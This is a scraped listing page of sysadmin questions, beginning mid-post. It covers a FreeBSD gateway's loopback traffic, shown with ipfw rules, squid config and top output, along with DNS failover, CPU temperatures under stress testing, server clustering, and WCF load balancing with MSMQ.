0.0 0.0 2532 908 pts/0 R+ 13:21 0:00 ps aux Lately, without any significant changes to the configuration, the memory usage started peaking and going over 512, causing the virtual server to kill apache, basically murdering our site in the process. Do you have any idea if this is normal and more resources should be acquired? I don't think... since there isn't too much data or traffic online yet.

    Read the article

  • FreeBSD high load loopback interface

    - by user1740915
    I have a problem with a FreeBSD server. There is a FreeBSD 9.0 amd64, two network cards em1 (internet), em0 (local network) configured firewall ipfw, natd, squid (not transparent), the server acts as a gateway for access to the Internet. Next problem: upload via squid is very low. At this moment I see next: natd, dhcpd load the cpu at that time when uploading through squid and there are a lot of traffic through the loopback interface. ipfw show output 0100 655389684 36707144666 allow ip from any to any via lo0 00200 0 0 deny ip from any to 127.0.0.0/8 00300 0 0 deny ip from 127.0.0.0/8 to any 00400 0 0 deny ip from any to ::1 00500 0 0 deny ip from ::1 to any 00600 4 292 allow ipv6-icmp from :: to ff02::/16 00700 0 0 allow ipv6-icmp from fe80::/10 to fe80::/10 00800 1 76 allow ipv6-icmp from fe80::/10 to ff02::/16 00900 0 0 allow ipv6-icmp from any to any ip6 icmp6types 1 01000 0 0 allow ipv6-icmp from any to any ip6 icmp6types 2,135,136 01100 1615 76160 deny ip from 192.168.1.1 to any in via em1 01200 0 0 deny ip from 199.69.99.11 to any in via em0 01300 46652 3705426 deny ip from any to 172.16.0.0/12 via em1 01400 3936404 345618870 deny ip from any to 192.168.0.0/16 via em1 01500 4 336 deny ip from any to 0.0.0.0/8 via em1 01600 4129 387621 deny ip from any to 169.254.0.0/16 via em1 01700 0 0 deny ip from any to 192.0.2.0/24 via em1 01800 917566 33777571 deny ip from any to 224.0.0.0/4 via em1 01900 147872 22029252 deny ip from any to 240.0.0.0/4 via em1 02000 1132194739 1190981955947 divert 8668 ip4 from any to any via em1 02100 3 248 deny ip from 172.16.0.0/12 to any via em1 02200 35925 2281289 deny ip from 192.168.0.0/16 to any via em1 02300 1808 122494 deny ip from 0.0.0.0/8 to any via em1 02400 3 174 deny ip from 169.254.0.0/16 to any via em1 02500 0 0 deny ip from 192.0.2.0/24 to any via em1 02600 0 0 deny ip from 224.0.0.0/4 to any via em1 02700 0 0 deny ip from 240.0.0.0/4 to any via em1 02800 960156249 1095316736582 allow tcp from any to any established 02900 64236062 8243196577 allow ip from any to any frag 03000 34 1756 allow tcp from any to me dst-port 25 setup 03100 193 11580 allow tcp from any to me dst-port 53 setup 03200 63 4222 allow udp from any to me dst-port 53 03300 64 8350 allow udp from me 53 to any 03400 417 24140 allow tcp from any to me dst-port 80 setup 03500 211 10472 allow ip from any to me dst-port 3389 setup 05300 77 4488 allow ip from any to me dst-port 1723 setup 05400 3 156 allow ip from any to me dst-port 8443 setup 05500 9882 590596 allow tcp from any to me dst-port 22 setup 05600 1 60 allow ip from any to me dst-port 2000 setup 05700 0 0 allow ip from any to me dst-port 2201 setup 07400 4241779 216690096 deny log logamount 1000 ip4 from any to any in via em1 setup proto tcp 07500 21135656 1048824936 allow tcp from any to any setup 07600 474447 35298081 allow udp from me to any dst-port 53 keep-state 07700 532 40612 allow udp from me to any dst-port 123 keep-state 65535 1990638432 1122305322718 allow ip from any to any systat -ifstat when uploading via squid Load Average ||| Interface Traffic Peak Total tun0 in 79.507 KB/s 232.479 KB/s 42.314 GB out 2.022 MB/s 2.424 MB/s 59.662 GB lo0 in 4.450 MB/s 4.450 MB/s 43.723 GB out 4.450 MB/s 4.450 MB/s 43.723 GB em1 in 2.629 MB/s 2.982 MB/s 464.533 GB out 2.493 MB/s 2.875 MB/s 484.673 GB em0 in 240.458 KB/s 296.941 KB/s 442.368 GB out 512.508 KB/s 850.857 KB/s 416.122 GB top output PID USERNAME THR PRI NICE SIZE RES STATE C TIME WCPU COMMAND 66885 root 1 92 0 26672K 2784K CPU3 3 528:43 65.48% natd 9160 dhcpd 1 45 0 31032K 9280K CPU1 1 7:40 32.96% dhcpd 66455 root 1 20 0 18344K 2856K select 1 119:27 1.37% openvpn 16043 squid 1 20 0 44404K 17884K kqread 2 0:22 0.29% squid squid.conf cat /usr/local/etc/squid/squid.conf # # Recommended minimum configuration: # acl manager proto cache_object acl localhost src 127.0.0.1/32 ::1 acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1 # Example rule allowing access from your local networks. # Adapt to list your (internal) IP networks from where browsing # should be allowed acl localnet src 10.0.0.0/8 # RFC1918 possible internal network acl localnet src 172.16.0.0/12 # RFC1918 possible internal network acl localnet src 192.168.0.0/16 # RFC1918 possible internal network acl localnet src fc00::/7 # RFC 4193 local private network range acl localnet src fe80::/10 # RFC 4291 link-local (directly plugged) machines acl SSL_ports port 443 acl Safe_ports port 80 # http acl Safe_ports port 21 # ftp acl Safe_ports port 443 # https acl Safe_ports port 70 # gopher acl Safe_ports port 210 # wais acl Safe_ports port 1025-65535 # unregistered ports acl Safe_ports port 280 # http-mgmt acl Safe_ports port 488 # gss-http acl Safe_ports port 591 # filemaker acl Safe_ports port 777 # multiling http acl CONNECT method CONNECT # # Recommended minimum Access Permission configuration: # # Only allow cachemgr access from localhost http_access allow manager localhost http_access deny manager # Deny requests to certain unsafe ports http_access deny !Safe_ports # Deny CONNECT to other than secure SSL ports http_access deny CONNECT !SSL_ports # We strongly recommend the following be uncommented to protect innocent # web applications running on the proxy server who think the only # one who can access services on "localhost" is a local user http_access deny to_localhost # # INSERT YOUR OWN RULE(S) HERE TO ALLOW ACCESS FROM YOUR CLIENTS # # Example rule allowing access from your local networks. # Adapt localnet in the ACL section to list your (internal) IP networks # from where browsing should be allowed http_access allow localnet http_access allow localhost # And finally deny all other access to this proxy http_access deny all # Squid normally listens to port 3128 http_port 192.168.1.1:3128 # Uncomment and adjust the following to add a disk cache directory. #cache_dir ufs /var/squid/cache 100 16 256 # Leave coredumps in the first cache dir coredump_dir /var/squid/cache I understand that the traffic passes through the SQUID several times. But can not find why.

    Read the article

  • DNS failover in a two datacenter scenario

    - by wanson
    I'm trying to implement a low-cost solution for website high availability. I'm looking for the downsides of the following scenario: I have two servers with the same configuration, content, mysql replication (dual-master). They are in different datacenters - let's call them serverA and serverB. Users use serverA - serverB is more like a backup. Now, I want to use DNS failover, to switch users from serverA to serverB when serverA goes down. My idea is that I setup DNS servers (bind/powerdns) on serverA and serverB - let's call them ns1.website.com and ns2.website.com (assuming I own website.com). Then I configure my domain to use them as its nameservers. Both DNS servers will return serverA IP as my website's IP. If serverA goes down I can (either manually or automatically from serverB) change configuration of serverB's DNS, to return IP of serverB as website's IP. Of course the TTL will be low, as it's supposed to be in DNS failovers. I know that it may take some time to switch to serverB (DNS ttl, time to detect serverA failure, serverB DNS reconfiguration etc), and that some small part of users won't use serverB anyway. And I'm OK with that. But what are other downsides of such an approach? An alternative scenario is that ns1.website.com will return serverA IP as website's IP, and ns2.website.com will return serverB IP as website's IP. But AFAIK clients not always use primary nameserver and sometimes would use secondary one. So some small part of users would use serverB instead of serverA which is not quite what I'd like. Can you confirm that DNS clients behave like that and can you tell what percentage of clients would possibly use serverB instead of serverA (statistically)? This one also has the downside that when serverA goes back up, it will be automatically used as website's primary server, which is also a bad situation (cold cache, mysql replication could fail in the meantime etc). So I'm adding it only as a theoretical alternative. I was thinking about using some professional DNS failover companies but they charge for the number of DNS requests and the fees are very high (why?)

    Read the article

  • Max. Temp. on Intel Burn Test for Stock Dell Precision T3500

    - by HK1
    I'm troubleshooting an issue on a Dell Precision T3500. As part of my troubleshooting I've decided to try running a stress test using Intel Burn Test software. This machine is a stock configuration with 12GB of RAM and a Xeon W3670 processor (nothing overclocked). When I run IBT using the standard mode, SpeedFan reports a processor temperature in excess of 80C. I've seen numbers as high as 90C but even at that temperature the machine does not become unstable or crash. However, it seems way too high. This processor has a TCase of 67.9C according to Intel's website. I'm guessing that means I'm in the danger zone any time I go over that temperature. I've checked the cooling system and everything looks fine. I've even took out the heat sink and reinstalled it with new thermal compound. This did not appear to make the problem better or worse. Is there a discrepancy somewhere here in the way temperatures are measured or displayed? I've also tried using HWMonitor from CPUID and it reports the same temperatures. Should I just let the Standard Test go and disregard the temperature outputs?

    Read the article

  • Difference between all servers in one cluster and more than one cluster with servers?

    - by silla
    Not sure I understand what´s the difference or how it works when servers a running in one cluster or if there are more than one clusters with servers in it - regard High availability & Load Balancing. For me they are somehow the same, there is not really a big difference. Let´s make a simple example: 2 Servers in 1 Cluster 2 Clusters with each 1 Server - 1. If one Server failure, the other one is able to continue the work. The same for Load Balancing, these two Servers are able to balance the work together. - 2. The same thing! If one Server failure... The only thing that could be a problem with point 1. is if the Cluster fails (then both of the Server are dead). But is this even possible? I was reading stuff about clustering and high availability but I think I do not get this really. Probably I did not really understand how a cluster is working. Are these 2 points with 1 Cluster and 2 Clusters somehow the same or are there really some big differences? What should I know about it? Thank you

    Read the article

  • Load Balance WCF and Share a Remote MSMQ for High Throughput

    - by BarDev
    After a ton of reading in books and on the web, I have noticed hints of information that WCF and MSMQ can be used in achieving high throughput. The information I have seen mentions using multiple WCF services in a farm that reads from a single MSMQ queue. The problem is that I have found paragraphs here and there that mentions that high throughput can be done, but I cannot seem to find a document of how to implement it. The following is an excerpt from a MSDN article. The following paragraph is from Best Practices for Queued Communication http://msdn.microsoft.com/en-us/library/ms731093.aspx To achieve higher throughput and availability, use a farm of WCF services that read from the queue. This requires that all of these services expose the same contract on the same endpoint. The farm approach works best for applications that have high production rates of messages because it enables a number of services to all read from the same queue. This is what I'm trying to solve. I have an intranet application where a client sends a request to a WCF service. But I want the ability to load balance the WCF services on multiple servers in a farm. I also want these WCF services in the farm to do transactional reads from a remote MSMQ when an item is available in the Queue. If this is possible, an issue I have is that I do not understand the activation process of WCF to retrieve messages from a remote queue. If this is possible, does anyone know of any articles or Webcasts that would explain it in detail? BarDev

    Read the article

< Previous Page | 61 62 63 64 65 66 67 68 69 70 71 72  | Next Page >